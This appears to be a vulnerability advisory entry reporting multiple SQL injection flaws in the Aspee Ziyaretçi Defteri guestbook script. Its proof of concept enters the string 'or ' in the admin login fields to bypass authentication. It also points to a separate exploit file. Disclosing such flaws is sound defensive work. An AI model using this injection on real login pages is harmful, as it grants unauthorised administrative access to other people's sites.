• info
• discussion
• exploit
• solution
• references

Aspee Ziyaretçi Defteri Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a web client.

The following proofs of concept are available:

HTTP GET request:

1. Go to: http://www.example.com/[path to script]/admin.asp

2. Type 'or ' in the username and password input boxes.

HTTP POST request:

• /data/vulnerabilities/exploits/21398.html